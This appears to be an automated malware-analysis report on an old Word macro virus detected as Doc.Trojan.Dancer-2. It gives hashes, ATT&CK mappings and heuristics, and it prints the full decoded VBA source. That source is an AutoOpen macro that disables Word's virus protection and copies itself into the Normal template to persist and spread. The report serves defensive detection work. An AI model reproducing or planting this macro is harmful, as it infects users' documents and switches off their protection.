Office (OLE) malware analysis — malicious · 5ebfb5e808750675

MALICIOUS

Office (OLE)

26.5 KB Created: 1999-06-21 14:26:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: c32c273c0af53e0d107db50d9b8241c2 SHA-1: e895110e7c5fae3cb449cc616af858626304993b SHA-256: 5ebfb5e8087506753a493ebae529db3c6242f1fb0f2fb325fda45fb83c70d16d

200 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is an OLE document containing a VBA macro with an AutoOpen subroutine. This macro attempts to export itself to 'c:\dancer.wav' and then import it into the Normal template, suggesting an attempt to establish persistence. The macro also checks a registry key 'HKEY_CURRENT_USER\dancer' to avoid re-execution, indicating a persistence mechanism.

Heuristics 4

ClamAV: Doc.Trojan.Dancer-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Dancer-2
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	802 bytes
SHA-256: `309c234a18179258fce6ae710bdf0155e5d1cebbe588a5cca56a3071e7b671a4`
Detection ClamAV: Doc.Trojan.Dancer-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "dancer" Sub AutoOpen() On Error Resume Next Options.VirusProtection = False a$ = "HKEY_CURRENT_USER\dancer" If (System.PrivateProfileString("", a$, "dancer") = False) Then ActiveDocument.VBProject.VBComponents("dancer").Export "c:\dancer.wav" NormalTemplate.VBProject.VBComponents.Import ("c:\dancer.wav") System.PrivateProfileString("", a$, "dancer") = True ElseIf ActiveDocument.VBProject.VBComponents.Item("dancer").Name <> "dancer" Then ActiveDocument.VBProject.VBComponents.Import ("c:\dancer.wav") End If End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.